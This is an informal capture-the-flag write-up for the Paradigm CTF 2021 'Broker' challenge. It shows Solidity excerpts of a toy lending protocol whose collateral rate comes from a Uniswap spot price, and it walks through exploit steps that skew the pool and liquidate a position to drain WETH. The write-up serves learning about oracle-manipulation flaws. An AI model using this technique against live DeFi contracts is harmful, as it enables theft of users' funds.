Broker Challenge

| Paradigm CTF 2021 Challenge - Oracle Manipulation Hack

Description & Setup#

The majority of the setup is in the Setup.sol smart contract, it contains:

  • AMT Token Contract: been used as the treasury token for lending protocol
  • IUniswapV2Factory Interface: interface for Uniswap V2 create pair & Setup
  • Setup Contract: create and bootstrap the token/weth pool for borrowing against WETH
Contract Address (Our hack target)Paradigm-CTF-2021-Broker
Setup ContractParadigm-CTF-2021-Broker-Setup
Solution ContractSolution

Below is the setup logic:

  • 1st create a pair for AMT & WETH
  • 2nd transfer 25 WETH & 500,000 AMT token to the pair
  • 3rd deposit 25 eth to borrow 250,000 AMT token from the lending protocol
  // create and bootstrap the token/weth pool for borrowing against WETH
    constructor() payable {
        require(msg.value == 50 ether);
        weth.deposit{value: msg.value}();

        token = new Token();
        pair = IUniswapV2Pair(factory.createPair(address(weth), address(token)));
        broker = new Broker(pair, ERC20Like(address(token)));
        token.transfer(address(broker), 500_000 * DECIMALS);

        // 1:25
        weth.transfer(address(pair), 25 ether);
        token.transfer(address(pair), 500_000 * DECIMALS);;

        weth.approve(address(broker), type(uint256).max);
        broker.deposit(25 ether);
        broker.borrow(250_000 * DECIMALS);

        totalBefore = weth.balanceOf(address(broker)) + token.balanceOf(address(broker)) / broker.rate();

Essentially, broker.sol is a simplified version of a ZERO-Interest Rate lending protocol. There are a lot of attack surfaces as a lending protoocl:

  • Collaterialized assets has reentrancy risks
  • Protocol might have reentrancy risks as well
  • Protocol implementation issue
  • Oracle attacks / manipulation & more


The way to attack this lending protocol is relatively easy to figure out. The key of the manipulation is within these lines of the code:

    function rate() public view returns (uint256) {
        (uint112 _reserve0, uint112 _reserve1,) = pair.getReserves();
        uint256 _rate = uint256(_reserve0 / _reserve1);
        return _rate;

The oracle implementation is without the TWAP just brutally using the spot price. Thus, we can use flashloan to manipulate the spot price and perform the attack, or just simply use the amount of tokens we had to perform the attack. In the liquidate function:

  // safeDebt calculation
    function safeDebt(address user) public view returns (uint256) {
          return deposited[user] * rate() * 2 / 3;

 // repay a user's loan and get back their collateral. no discounts.
    function liquidate(address user, uint256 amount) public returns (uint256) {
        require(safeDebt(user) <= debt[user], "err: overcollateralized");
        debt[user] -= amount;
        token.transferFrom(msg.sender, address(this), amount);
        uint256 collateralValueRepaid = amount / rate();
        weth.transfer(msg.sender, collateralValueRepaid);
        return collateralValueRepaid;

If user's debt is bigger than their safeDebt which means user borrowed AMT token price goes rocket. Anyone can call liquidation method to liquidate user's fund.

Implementation: Step 1: Trade 13 ETH for AMT token -> make the token price go roket

 // trade 13 eth for some tokens
    address[] memory path = new address[](2);
    path[0] = address(weth);
    path[1] = address(token);
    uint256[] memory tokensReceived = router.swapExactTokensForTokens(

Step 2: we can liquidate the guy with the tokens received

    uint256 receivedCollateral = broker.liquidate(address(setup), tokenReceived);
    require(weth.balanceOf(address(this)) > balanceBefore);

Although the given solution manipulation is not profitable, but we can for sure manipulate the oracle. I found another method online, which has similar idea:

Step 1: skew the uniswap ratio by buying lots of tokens

    weth.transfer(address(pair), weth.balanceOf(address(this)));

Step 2: since win condition is when there are less than 5 eth in the pool, thus we only need to liquidate 21 eth.

    uint256 liqAmount = 21 ether * rate;
    broker.liquidate(address(setup), liqAmount);